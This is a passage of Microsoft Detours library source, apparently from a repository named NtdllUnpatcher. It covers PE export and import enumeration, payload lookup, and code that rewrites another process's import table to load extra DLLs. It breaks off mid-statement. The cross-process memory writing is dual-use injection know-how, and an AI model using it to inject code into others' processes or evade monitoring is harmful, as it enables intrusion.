pExportDir 508 | = (PIMAGE_EXPORT_DIRECTORY) 509 | RvaAdjust(pDosHeader, 510 | pNtHeader->OptionalHeader 511 | .DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress); 512 | 513 | if (pExportDir == NULL) { 514 | SetLastError(ERROR_EXE_MARKED_INVALID); 515 | return FALSE; 516 | } 517 | 518 | PBYTE pExportDirEnd = (PBYTE)pExportDir + pNtHeader->OptionalHeader 519 | .DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size; 520 | PDWORD pdwFunctions = (PDWORD)RvaAdjust(pDosHeader, pExportDir->AddressOfFunctions); 521 | PDWORD pdwNames = (PDWORD)RvaAdjust(pDosHeader, pExportDir->AddressOfNames); 522 | PWORD pwOrdinals = (PWORD)RvaAdjust(pDosHeader, pExportDir->AddressOfNameOrdinals); 523 | 524 | for (DWORD nFunc = 0; nFunc < pExportDir->NumberOfFunctions; nFunc++) { 525 | PBYTE pbCode = (pdwFunctions != NULL) 526 | ? (PBYTE)RvaAdjust(pDosHeader, pdwFunctions[nFunc]) : NULL; 527 | PCHAR pszName = NULL; 528 | 529 | // if the pointer is in the export region, then it is a forwarder. 530 | if (pbCode > (PBYTE)pExportDir && pbCode < pExportDirEnd) { 531 | pbCode = NULL; 532 | } 533 | 534 | for (DWORD n = 0; n < pExportDir->NumberOfNames; n++) { 535 | if (pwOrdinals[n] == nFunc) { 536 | pszName = (pdwNames != NULL) 537 | ? (PCHAR)RvaAdjust(pDosHeader, pdwNames[n]) : NULL; 538 | break; 539 | } 540 | } 541 | ULONG nOrdinal = pExportDir->Base + nFunc; 542 | 543 | if (!pfExport(pContext, nOrdinal, pszName, pbCode)) { 544 | break; 545 | } 546 | } 547 | SetLastError(NO_ERROR); 548 | return TRUE; 549 | } 550 | __except(GetExceptionCode() == EXCEPTION_ACCESS_VIOLATION ? 551 | EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH) { 552 | SetLastError(ERROR_EXE_MARKED_INVALID); 553 | return NULL; 554 | } 555 | } 556 | 557 | BOOL WINAPI DetourEnumerateImportsEx(_In_opt_ HMODULE hModule, 558 | _In_opt_ PVOID pContext, 559 | _In_opt_ PF_DETOUR_IMPORT_FILE_CALLBACK pfImportFile, 560 | _In_opt_ PF_DETOUR_IMPORT_FUNC_CALLBACK_EX pfImportFunc) 561 | { 562 | PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)hModule; 563 | if (hModule == NULL) { 564 | pDosHeader = (PIMAGE_DOS_HEADER)GetModuleHandleW(NULL); 565 | } 566 | 567 | __try { 568 | #pragma warning(suppress:6011) // GetModuleHandleW(NULL) never returns NULL. 569 | if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE) { 570 | SetLastError(ERROR_BAD_EXE_FORMAT); 571 | return FALSE; 572 | } 573 | 574 | PIMAGE_NT_HEADERS pNtHeader = (PIMAGE_NT_HEADERS)((PBYTE)pDosHeader + 575 | pDosHeader->e_lfanew); 576 | if (pNtHeader->Signature != IMAGE_NT_SIGNATURE) { 577 | SetLastError(ERROR_INVALID_EXE_SIGNATURE); 578 | return FALSE; 579 | } 580 | if (pNtHeader->FileHeader.SizeOfOptionalHeader == 0) { 581 | SetLastError(ERROR_EXE_MARKED_INVALID); 582 | return FALSE; 583 | } 584 | 585 | PIMAGE_IMPORT_DESCRIPTOR iidp 586 | = (PIMAGE_IMPORT_DESCRIPTOR) 587 | RvaAdjust(pDosHeader, 588 | pNtHeader->OptionalHeader 589 | .DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress); 590 | 591 | if (iidp == NULL) { 592 | SetLastError(ERROR_EXE_MARKED_INVALID); 593 | return FALSE; 594 | } 595 | 596 | for (; iidp->OriginalFirstThunk != 0; iidp++) { 597 | 598 | PCSTR pszName = (PCHAR)RvaAdjust(pDosHeader, iidp->Name); 599 | if (pszName == NULL) { 600 | SetLastError(ERROR_EXE_MARKED_INVALID); 601 | return FALSE; 602 | } 603 | 604 | PIMAGE_THUNK_DATA pThunks = (PIMAGE_THUNK_DATA) 605 | RvaAdjust(pDosHeader, iidp->OriginalFirstThunk); 606 | PVOID * pAddrs = (PVOID *) 607 | RvaAdjust(pDosHeader, iidp->FirstThunk); 608 | 609 | HMODULE hFile = DetourGetContainingModule(pAddrs[0]); 610 | 611 | if (pfImportFile != NULL) { 612 | if (!pfImportFile(pContext, hFile, pszName)) { 613 | break; 614 | } 615 | } 616 | 617 | DWORD nNames = 0; 618 | if (pThunks) { 619 | for (; pThunks[nNames].u1.Ordinal; nNames++) { 620 | DWORD nOrdinal = 0; 621 | PCSTR pszFunc = NULL; 622 | 623 | if (IMAGE_SNAP_BY_ORDINAL(pThunks[nNames].u1.Ordinal)) { 624 | nOrdinal = (DWORD)IMAGE_ORDINAL(pThunks[nNames].u1.Ordinal); 625 | } 626 | else { 627 | pszFunc = (PCSTR)RvaAdjust(pDosHeader, 628 | (DWORD)pThunks[nNames].u1.AddressOfData + 2); 629 | } 630 | 631 | if (pfImportFunc != NULL) { 632 | if (!pfImportFunc(pContext, 633 | nOrdinal, 634 | pszFunc, 635 | &pAddrs[nNames])) { 636 | break; 637 | } 638 | } 639 | } 640 | if (pfImportFunc != NULL) { 641 | pfImportFunc(pContext, 0, NULL, NULL); 642 | } 643 | } 644 | } 645 | if (pfImportFile != NULL) { 646 | pfImportFile(pContext, NULL, NULL); 647 | } 648 | SetLastError(NO_ERROR); 649 | return TRUE; 650 | } 651 | __except(GetExceptionCode() == EXCEPTION_ACCESS_VIOLATION ? 652 | EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH) { 653 | SetLastError(ERROR_EXE_MARKED_INVALID); 654 | return FALSE; 655 | } 656 | } 657 | 658 | // Context for DetourEnumerateImportsThunk, which adapts "regular" callbacks for use with "Ex". 659 | struct _DETOUR_ENUMERATE_IMPORTS_THUNK_CONTEXT 660 | { 661 | PVOID pContext; 662 | PF_DETOUR_IMPORT_FUNC_CALLBACK pfImportFunc; 663 | }; 664 | 665 | // Callback for DetourEnumerateImportsEx that adapts DetourEnumerateImportsEx 666 | // for use with a DetourEnumerateImports callback -- derefence the IAT and pass the value on. 667 | 668 | static 669 | BOOL 670 | CALLBACK 671 | DetourEnumerateImportsThunk(_In_ PVOID VoidContext, 672 | _In_ DWORD nOrdinal, 673 | _In_opt_ PCSTR pszFunc, 674 | _In_opt_ PVOID* ppvFunc) 675 | { 676 | _DETOUR_ENUMERATE_IMPORTS_THUNK_CONTEXT const * const 677 | pContext = (_DETOUR_ENUMERATE_IMPORTS_THUNK_CONTEXT*)VoidContext; 678 | return pContext->pfImportFunc(pContext->pContext, nOrdinal, pszFunc, ppvFunc ? *ppvFunc : NULL); 679 | } 680 | 681 | BOOL WINAPI DetourEnumerateImports(_In_opt_ HMODULE hModule, 682 | _In_opt_ PVOID pContext, 683 | _In_opt_ PF_DETOUR_IMPORT_FILE_CALLBACK pfImportFile, 684 | _In_opt_ PF_DETOUR_IMPORT_FUNC_CALLBACK pfImportFunc) 685 | { 686 | _DETOUR_ENUMERATE_IMPORTS_THUNK_CONTEXT const context = { pContext, pfImportFunc }; 687 | 688 | return DetourEnumerateImportsEx(hModule, 689 | (PVOID)&context, 690 | pfImportFile, 691 | &DetourEnumerateImportsThunk); 692 | } 693 | 694 | static PDETOUR_LOADED_BINARY WINAPI GetPayloadSectionFromModule(HMODULE hModule) 695 | { 696 | PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)hModule; 697 | if (hModule == NULL) { 698 | pDosHeader = (PIMAGE_DOS_HEADER)GetModuleHandleW(NULL); 699 | } 700 | 701 | __try { 702 | #pragma warning(suppress:6011) // GetModuleHandleW(NULL) never returns NULL. 703 | if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE) { 704 | SetLastError(ERROR_BAD_EXE_FORMAT); 705 | return NULL; 706 | } 707 | 708 | PIMAGE_NT_HEADERS pNtHeader = (PIMAGE_NT_HEADERS)((PBYTE)pDosHeader + 709 | pDosHeader->e_lfanew); 710 | if (pNtHeader->Signature != IMAGE_NT_SIGNATURE) { 711 | SetLastError(ERROR_INVALID_EXE_SIGNATURE); 712 | return NULL; 713 | } 714 | if (pNtHeader->FileHeader.SizeOfOptionalHeader == 0) { 715 | SetLastError(ERROR_EXE_MARKED_INVALID); 716 | return NULL; 717 | } 718 | 719 | PIMAGE_SECTION_HEADER pSectionHeaders 720 | = (PIMAGE_SECTION_HEADER)((PBYTE)pNtHeader 721 | + sizeof(pNtHeader->Signature) 722 | + sizeof(pNtHeader->FileHeader) 723 | + pNtHeader->FileHeader.SizeOfOptionalHeader); 724 | 725 | for (DWORD n = 0; n < pNtHeader->FileHeader.NumberOfSections; n++) { 726 | if (strcmp((PCHAR)pSectionHeaders[n].Name, ".detour") == 0) { 727 | if (pSectionHeaders[n].VirtualAddress == 0 || 728 | pSectionHeaders[n].SizeOfRawData == 0) { 729 | 730 | break; 731 | } 732 | 733 | PBYTE pbData = (PBYTE)pDosHeader + pSectionHeaders[n].VirtualAddress; 734 | DETOUR_SECTION_HEADER *pHeader = (DETOUR_SECTION_HEADER *)pbData; 735 | if (pHeader->cbHeaderSize < sizeof(DETOUR_SECTION_HEADER) || 736 | pHeader->nSignature != DETOUR_SECTION_HEADER_SIGNATURE) { 737 | 738 | break; 739 | } 740 | 741 | if (pHeader->nDataOffset == 0) { 742 | pHeader->nDataOffset = pHeader->cbHeaderSize; 743 | } 744 | SetLastError(NO_ERROR); 745 | return (PBYTE)pHeader; 746 | } 747 | } 748 | SetLastError(ERROR_EXE_MARKED_INVALID); 749 | return NULL; 750 | } 751 | __except(GetExceptionCode() == EXCEPTION_ACCESS_VIOLATION ? 752 | EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH) { 753 | SetLastError(ERROR_EXE_MARKED_INVALID); 754 | return NULL; 755 | } 756 | } 757 | 758 | DWORD WINAPI DetourGetSizeOfPayloads(_In_opt_ HMODULE hModule) 759 | { 760 | PDETOUR_LOADED_BINARY pBinary = GetPayloadSectionFromModule(hModule); 761 | if (pBinary == NULL) { 762 | // Error set by GetPayloadSectionFromModule. 763 | return 0; 764 | } 765 | 766 | __try { 767 | DETOUR_SECTION_HEADER *pHeader = (DETOUR_SECTION_HEADER *)pBinary; 768 | if (pHeader->cbHeaderSize < sizeof(DETOUR_SECTION_HEADER) || 769 | pHeader->nSignature != DETOUR_SECTION_HEADER_SIGNATURE) { 770 | 771 | SetLastError(ERROR_INVALID_HANDLE); 772 | return 0; 773 | } 774 | SetLastError(NO_ERROR); 775 | return pHeader->cbDataSize; 776 | } 777 | __except(GetExceptionCode() == EXCEPTION_ACCESS_VIOLATION ? 778 | EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH) { 779 | SetLastError(ERROR_INVALID_HANDLE); 780 | return 0; 781 | } 782 | } 783 | 784 | _Writable_bytes_(*pcbData) 785 | _Readable_bytes_(*pcbData) 786 | _Success_(return != NULL) 787 | PVOID WINAPI DetourFindPayload(_In_opt_ HMODULE hModule, 788 | _In_ REFGUID rguid, 789 | _Out_ DWORD *pcbData) 790 | { 791 | PBYTE pbData = NULL; 792 | if (pcbData) { 793 | *pcbData = 0; 794 | } 795 | 796 | PDETOUR_LOADED_BINARY pBinary = GetPayloadSectionFromModule(hModule); 797 | if (pBinary == NULL) { 798 | // Error set by GetPayloadSectionFromModule. 799 | return NULL; 800 | } 801 | 802 | __try { 803 | DETOUR_SECTION_HEADER *pHeader = (DETOUR_SECTION_HEADER *)pBinary; 804 | if (pHeader->cbHeaderSize < sizeof(DETOUR_SECTION_HEADER) || 805 | pHeader->nSignature != DETOUR_SECTION_HEADER_SIGNATURE) { 806 | 807 | SetLastError(ERROR_INVALID_EXE_SIGNATURE); 808 | return NULL; 809 | } 810 | 811 | PBYTE pbBeg = ((PBYTE)pHeader) + pHeader->nDataOffset; 812 | PBYTE pbEnd = ((PBYTE)pHeader) + pHeader->cbDataSize; 813 | 814 | for (pbData = pbBeg; pbData < pbEnd;) { 815 | DETOUR_SECTION_RECORD *pSection = (DETOUR_SECTION_RECORD *)pbData; 816 | 817 | if (pSection->guid.Data1 == rguid.Data1 && 818 | pSection->guid.Data2 == rguid.Data2 && 819 | pSection->guid.Data3 == rguid.Data3 && 820 | pSection->guid.Data4[0] == rguid.Data4[0] && 821 | pSection->guid.Data4[1] == rguid.Data4[1] && 822 | pSection->guid.Data4[2] == rguid.Data4[2] && 823 | pSection->guid.Data4[3] == rguid.Data4[3] && 824 | pSection->guid.Data4[4] == rguid.Data4[4] && 825 | pSection->guid.Data4[5] == rguid.Data4[5] && 826 | pSection->guid.Data4[6] == rguid.Data4[6] && 827 | pSection->guid.Data4[7] == rguid.Data4[7]) { 828 | 829 | if (pcbData) { 830 | *pcbData = pSection->cbBytes - sizeof(*pSection); 831 | SetLastError(NO_ERROR); 832 | return (PBYTE)(pSection + 1); 833 | } 834 | } 835 | 836 | pbData = (PBYTE)pSection + pSection->cbBytes; 837 | } 838 | SetLastError(ERROR_INVALID_HANDLE); 839 | return NULL; 840 | } 841 | __except(GetExceptionCode() == EXCEPTION_ACCESS_VIOLATION ? 842 | EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH) { 843 | SetLastError(ERROR_INVALID_HANDLE); 844 | return NULL; 845 | } 846 | } 847 | 848 | _Writable_bytes_(*pcbData) 849 | _Readable_bytes_(*pcbData) 850 | _Success_(return != NULL) 851 | PVOID WINAPI DetourFindPayloadEx(_In_ REFGUID rguid, 852 | _Out_ DWORD * pcbData) 853 | { 854 | for (HMODULE hMod = NULL; (hMod = DetourEnumerateModules(hMod)) != NULL;) { 855 | PVOID pvData; 856 | 857 | pvData = DetourFindPayload(hMod, rguid, pcbData); 858 | if (pvData != NULL) { 859 | return pvData; 860 | } 861 | } 862 | SetLastError(ERROR_MOD_NOT_FOUND); 863 | return NULL; 864 | } 865 | 866 | BOOL WINAPI DetourRestoreAfterWithEx(_In_reads_bytes_(cbData) PVOID pvData, 867 | _In_ DWORD cbData) 868 | { 869 | PDETOUR_EXE_RESTORE pder = (PDETOUR_EXE_RESTORE)pvData; 870 | 871 | if (pder->cb != sizeof(*pder) || pder->cb > cbData) { 872 | SetLastError(ERROR_BAD_EXE_FORMAT); 873 | return FALSE; 874 | } 875 | 876 | DWORD dwPermIdh = ~0u; 877 | DWORD dwPermInh = ~0u; 878 | DWORD dwPermClr = ~0u; 879 | DWORD dwIgnore; 880 | BOOL fSucceeded = FALSE; 881 | BOOL fUpdated32To64 = FALSE; 882 | 883 | if (pder->pclr != NULL && pder->clr.Flags != ((PDETOUR_CLR_HEADER)pder->pclr)->Flags) { 884 | // If we had to promote the 32/64-bit agnostic IL to 64-bit, we can't restore 885 | // that. 886 | fUpdated32To64 = TRUE; 887 | } 888 | 889 | if (DetourVirtualProtectSameExecute(pder->pidh, pder->cbidh, 890 | PAGE_EXECUTE_READWRITE, &dwPermIdh)) { 891 | if (DetourVirtualProtectSameExecute(pder->pinh, pder->cbinh, 892 | PAGE_EXECUTE_READWRITE, &dwPermInh)) { 893 | 894 | CopyMemory(pder->pidh, &pder->idh, pder->cbidh); 895 | CopyMemory(pder->pinh, &pder->inh, pder->cbinh); 896 | 897 | if (pder->pclr != NULL && !fUpdated32To64) { 898 | if (DetourVirtualProtectSameExecute(pder->pclr, pder->cbclr, 899 | PAGE_EXECUTE_READWRITE, &dwPermClr)) { 900 | CopyMemory(pder->pclr, &pder->clr, pder->cbclr); 901 | VirtualProtect(pder->pclr, pder->cbclr, dwPermClr, &dwIgnore); 902 | fSucceeded = TRUE; 903 | } 904 | } 905 | else { 906 | fSucceeded = TRUE; 907 | } 908 | VirtualProtect(pder->pinh, pder->cbinh, dwPermInh, &dwIgnore); 909 | } 910 | VirtualProtect(pder->pidh, pder->cbidh, dwPermIdh, &dwIgnore); 911 | } 912 | return fSucceeded; 913 | } 914 | 915 | BOOL WINAPI DetourRestoreAfterWith() 916 | { 917 | PVOID pvData; 918 | DWORD cbData; 919 | 920 | pvData = DetourFindPayloadEx(DETOUR_EXE_RESTORE_GUID, &cbData); 921 | 922 | if (pvData != NULL && cbData != 0) { 923 | return DetourRestoreAfterWithEx(pvData, cbData); 924 | } 925 | SetLastError(ERROR_MOD_NOT_FOUND); 926 | return FALSE; 927 | } 928 | 929 | // End of File 930 | -------------------------------------------------------------------------------- /Detours-master/src/obj.X64/creatwth.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/Detours-master/src/obj.X64/creatwth.obj -------------------------------------------------------------------------------- /Detours-master/src/obj.X64/detours.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/Detours-master/src/obj.X64/detours.obj -------------------------------------------------------------------------------- /Detours-master/src/obj.X64/disasm.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/Detours-master/src/obj.X64/disasm.obj -------------------------------------------------------------------------------- /Detours-master/src/obj.X64/disolarm.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/Detours-master/src/obj.X64/disolarm.obj -------------------------------------------------------------------------------- /Detours-master/src/obj.X64/disolarm64.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/Detours-master/src/obj.X64/disolarm64.obj -------------------------------------------------------------------------------- /Detours-master/src/obj.X64/disolia64.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/Detours-master/src/obj.X64/disolia64.obj -------------------------------------------------------------------------------- /Detours-master/src/obj.X64/disolx64.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/Detours-master/src/obj.X64/disolx64.obj -------------------------------------------------------------------------------- /Detours-master/src/obj.X64/disolx86.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/Detours-master/src/obj.X64/disolx86.obj -------------------------------------------------------------------------------- /Detours-master/src/obj.X64/image.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/Detours-master/src/obj.X64/image.obj -------------------------------------------------------------------------------- /Detours-master/src/obj.X64/modules.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/Detours-master/src/obj.X64/modules.obj -------------------------------------------------------------------------------- /Detours-master/src/uimports.cpp: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Add DLLs to a module import table (uimports.cpp of detours.lib) 4 | // 5 | // Microsoft Research Detours Package, Version 4.0.1 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | // Note that this file is included into creatwth.cpp one or more times 10 | // (once for each supported module format). 11 | // 12 | 13 | #if DETOURS_VERSION != 0x4c0c1 // 0xMAJORcMINORcPATCH 14 | #error detours.h version mismatch 15 | #endif 16 | 17 | // UpdateImports32 aka UpdateImports64 18 | static BOOL UPDATE_IMPORTS_XX(HANDLE hProcess, 19 | HMODULE hModule, 20 | __in_ecount(nDlls) LPCSTR *plpDlls, 21 | DWORD nDlls) 22 | { 23 | BOOL fSucceeded = FALSE; 24 | DWORD cbNew = 0; 25 | 26 | BYTE * pbNew = NULL; 27 | DWORD i; 28 | SIZE_T cbRead; 29 | DWORD n; 30 | 31 | PBYTE pbModule = (PBYTE)hModule; 32 | 33 | IMAGE_DOS_HEADER idh; 34 | ZeroMemory(&idh, sizeof(idh)); 35 | if (!ReadProcessMemory(hProcess, pbModule, &idh, sizeof(idh), &cbRead) 36 | || cbRead < sizeof(idh)) { 37 | 38 | DETOUR_TRACE(("ReadProcessMemory(idh@%p..%p) failed: %d\n", 39 | pbModule, pbModule + sizeof(idh), GetLastError())); 40 | 41 | finish: 42 | if (pbNew != NULL) { 43 | delete[] pbNew; 44 | pbNew = NULL; 45 | } 46 | return fSucceeded; 47 | } 48 | 49 | IMAGE_NT_HEADERS_XX inh; 50 | ZeroMemory(&inh, sizeof(inh)); 51 | 52 | if (!ReadProcessMemory(hProcess, pbModule + idh.e_lfanew, &inh, sizeof(inh), &cbRead) 53 | || cbRead < sizeof(inh)) { 54 | DETOUR_TRACE(("ReadProcessMemory(inh@%p..%p) failed: %d\n", 55 | pbModule + idh.e_lfanew, 56 | pbModule + idh.e_lfanew + sizeof(inh), 57 | GetLastError())); 58 | goto finish; 59 | } 60 | 61 | if (inh.OptionalHeader.Magic != IMAGE_NT_OPTIONAL_HDR_MAGIC_XX) { 62 | DETOUR_TRACE(("Wrong size image (%04x != %04x).\n", 63 | inh.OptionalHeader.Magic, IMAGE_NT_OPTIONAL_HDR_MAGIC_XX)); 64 | SetLastError(ERROR_INVALID_BLOCK); 65 | goto finish; 66 | } 67 | 68 | // Zero out the bound table so loader doesn't use it instead of our new table. 69 | inh.BOUND_DIRECTORY.VirtualAddress = 0; 70 | inh.BOUND_DIRECTORY.Size = 0; 71 | 72 | // Find the size of the mapped file. 73 | DWORD dwSec = idh.e_lfanew + 74 | FIELD_OFFSET(IMAGE_NT_HEADERS_XX, OptionalHeader) + 75 | inh.FileHeader.SizeOfOptionalHeader; 76 | 77 | for (i = 0; i < inh.FileHeader.NumberOfSections; i++) { 78 | IMAGE_SECTION_HEADER ish; 79 | ZeroMemory(&ish, sizeof(ish)); 80 | 81 | if (!ReadProcessMemory(hProcess, pbModule + dwSec + sizeof(ish) * i, &ish, 82 | sizeof(ish), &cbRead) 83 | || cbRead < sizeof(ish)) { 84 | 85 | DETOUR_TRACE(("ReadProcessMemory(ish@%p..%p) failed: %d\n", 86 | pbModule + dwSec + sizeof(ish) * i, 87 | pbModule + dwSec + sizeof(ish) * (i + 1), 88 | GetLastError())); 89 | goto finish; 90 | } 91 | 92 | DETOUR_TRACE(("ish[%d] : va=%08x sr=%d\n", i, ish.VirtualAddress, ish.SizeOfRawData)); 93 | 94 | // If the file didn't have an IAT_DIRECTORY, we assign it... 95 | if (inh.IAT_DIRECTORY.VirtualAddress == 0 && 96 | inh.IMPORT_DIRECTORY.VirtualAddress >= ish.VirtualAddress && 97 | inh.IMPORT_DIRECTORY.VirtualAddress < ish.VirtualAddress + ish.SizeOfRawData) { 98 | 99 | inh.IAT_DIRECTORY.VirtualAddress = ish.VirtualAddress; 100 | inh.IAT_DIRECTORY.Size = ish.SizeOfRawData; 101 | } 102 | } 103 | 104 | DETOUR_TRACE((" Imports: %p..%p\n", 105 | (DWORD_PTR)pbModule + inh.IMPORT_DIRECTORY.VirtualAddress, 106 | (DWORD_PTR)pbModule + inh.IMPORT_DIRECTORY.VirtualAddress + 107 | inh.IMPORT_DIRECTORY.Size)); 108 | 109 | DWORD nOldDlls = inh.IMPORT_DIRECTORY.Size / sizeof(IMAGE_IMPORT_DESCRIPTOR); 110 | DWORD obRem = sizeof(IMAGE_IMPORT_DESCRIPTOR) * nDlls; 111 | DWORD obOld = obRem + sizeof(IMAGE_IMPORT_DESCRIPTOR) * nOldDlls; 112 | DWORD obTab = PadToDwordPtr(obOld); 113 | DWORD obDll = obTab + sizeof(DWORD_XX) * 4 * nDlls; 114 | DWORD obStr = obDll; 115 | cbNew = obStr; 116 | for (n = 0; n < nDlls; n++) { 117 | cbNew += PadToDword((DWORD)strlen(plpDlls[n]) + 1); 118 | } 119 | 120 | _Analysis_assume_(cbNew > 121 | sizeof(IMAGE_IMPORT_DESCRIPTOR) * (nDlls + nOldDlls) 122 | + sizeof(DWORD_XX) * 4 * nDlls); 123 | pbNew = new BYTE [cbNew]; 124 | if (pbNew == NULL) { 125 | DETOUR_TRACE(("new BYTE [cbNew] failed.\n")); 126 | goto finish; 127 | } 128 | ZeroMemory(pbNew, cbNew); 129 | 130 | PBYTE pbBase = pbModule; 131 | PBYTE pbNext = pbBase 132 | + inh.OptionalHeader.BaseOfCode 133 | + inh.OptionalHeader.SizeOfCode 134 | + inh.OptionalHeader.SizeOfInitializedData 135 | + inh.OptionalHeader.SizeOfUninitializedData; 136 | if (pbBase < pbNext) { 137 | pbBase = pbNext; 138 | } 139 | DETOUR_TRACE(("pbBase = %p\n", pbBase)); 140 | 141 | PBYTE pbNewIid = FindAndAllocateNearBase(hProcess, pbModule, pbBase, cbNew); 142 | if (pbNewIid == NULL) { 143 | DETOUR_TRACE(("FindAndAllocateNearBase failed.\n")); 144 | goto finish; 145 | } 146 | 147 | PIMAGE_IMPORT_DESCRIPTOR piid = (PIMAGE_IMPORT_DESCRIPTOR)pbNew; 148 | DWORD_XX *pt; 149 | 150 | DWORD obBase = (DWORD)(pbNewIid - pbModule); 151 | DWORD dwProtect = 0; 152 | 153 | if (inh.IMPORT_DIRECTORY.VirtualAddress != 0) { 154 | // Read the old import directory if it exists. 155 | DETOUR_TRACE(("IMPORT_DIRECTORY perms=%x\n", dwProtect)); 156 | 157 | if (!ReadProcessMemory(hProcess, 158 | pbModule + inh.IMPORT_DIRECTORY.VirtualAddress, 159 | &piid[nDlls], 160 | nOldDlls * sizeof(IMAGE_IMPORT_DESCRIPTOR), &cbRead) 161 | || cbRead < nOldDlls * sizeof(IMAGE_IMPORT_DESCRIPTOR)) { 162 | 163 | DETOUR_TRACE(("ReadProcessMemory(imports) failed: %d\n", GetLastError())); 164 | goto finish; 165 | } 166 | } 167 | 168 | for (n = 0; n < nDlls; n++) { 169 | HRESULT hrRet = StringCchCopyA((char*)pbNew + obStr, cbNew - obStr, plpDlls[n]); 170 | if (FAILED(hrRet)) { 171 | DETOUR_TRACE(("StringCchCopyA failed: %d\n", GetLastError())); 172 | goto finish; 173 | } 174 | 175 | // After copying the string, we patch up the size "??" bits if any. 176 | hrRet = ReplaceOptionalSizeA((char*)pbNew + obStr, 177 | cbNew - obStr, 178 | DETOURS_STRINGIFY(DETOURS_BITS_XX)); 179 | if (FAILED(hrRet)) { 180 | DETOUR_TRACE(("ReplaceOptionalSizeA failed: %d\n", GetLastError())); 181 | goto finish; 182 | } 183 | 184 | DWORD nOffset = obTab + (sizeof(DWORD_XX) * (4 * n)); 185 | piid[n].OriginalFirstThunk = obBase + nOffset; 186 | pt = ((DWORD_XX*)(pbNew + nOffset)); 187 | pt[0] = IMAGE_ORDINAL_FLAG_XX + 1; 188 | pt[1] = 0; 189 | 190 | nOffset = obTab + (sizeof(DWORD_XX) * ((4 * n) + 2)); 191 | piid[n].FirstThunk = obBase + nOffset; 192 | pt = ((DWORD_XX*)(pbNew + nOffset)); 193 | pt[0] = IMAGE_ORDINAL_FLAG_XX + 1; 194 | pt[1] = 0; 195 | piid[n].TimeDateStamp = 0; 196 | piid[n].ForwarderChain = 0; 197 | piid[n].Name = obBase + obStr; 198 | 199 | obStr += PadToDword((DWORD)strlen(plpDlls[n]) + 1); 200 | } 201 | _Analysis_assume_(obStr <= cbNew); 202 | 203 | #if 0 204 | for (i = 0; i < nDlls + nOldDlls; i++) { 205 | DETOUR_TRACE(("%8d. Look=%08x Time=%08x Fore=%08x Name=%08x Addr=%08x\n", 206 | i, 207 | piid[i].OriginalFirstThunk, 208 | piid[i].TimeDateStamp, 209 | piid[i].ForwarderChain, 210 | piid[i].Name, 211 | piid[i].FirstThunk)); 212 | if (piid[i].OriginalFirstThunk == 0 && piid[i].FirstThunk == 0) { 213 | break; 214 | } 215 | } 216 | #endif 217 | 218 | if (!WriteProcessMemory(hProcess, pbNewIid, pbNew, obStr, NULL)) { 219 | DETOUR_TRACE(("WriteProcessMemory(iid) failed: %d\n", GetLastError())); 220 | goto finish; 221 | } 222 | 223 | DETOUR_TRACE(("obBaseBef = %08x..%08x\n", 224 | inh.IMPORT_DIRECTORY.VirtualAddress, 225 | inh.IMPORT_DIRECTORY.VirtualAddress + inh.IMPORT_DIRECTORY.Size)); 226 | DETOUR_TRACE(("obBaseAft = %08x..%08x\n", obBase, obBase + obStr)); 227 | 228 | // If the file doesn't have an IAT_DIRECTORY, we create it... 229 | if (inh.IAT_DIRECTORY.VirtualAddress == 0) { 230 | inh.IAT_DIRECTORY.VirtualAddress = obBase; 231 | inh.IAT_DIRECTORY.Size = cbNew; 232 | } 233 | 234 | inh.IMPORT_DIRECTORY.VirtualAddress = obBase; 235 | inh.IMPORT_DIRECTORY.Size = cbNew; 236 | 237 | /////////////////////// Update the NT header for the new import directory. 238 | // 239 | if (!DetourVirtualProtectSameExecuteEx(hProcess, pbModule, inh.OptionalHeader.SizeOfHeaders, 240 | PAGE_EXECUTE_READWRITE, &dwProtect)) { 241 | DETOUR_TRACE(("VirtualProtectEx(inh) write failed: %d\n", GetLastError())); 242 | goto finish; 243 | } 244 | 245 | inh.OptionalHeader.CheckSum = 0; 246 | 247 | if (!WriteProcessMemory(hProcess, pbModule, &idh, sizeof(idh), NULL)) { 248 | DETOUR_TRACE(("WriteProcessMemory(idh) failed: %d\n", GetLastError())); 249 | goto finish; 250 | } 251 | DETOUR_TRACE(("WriteProcessMemory(idh:%p..%p)\n", pbModule, pbModule + sizeof(idh))); 252 | 253 | if 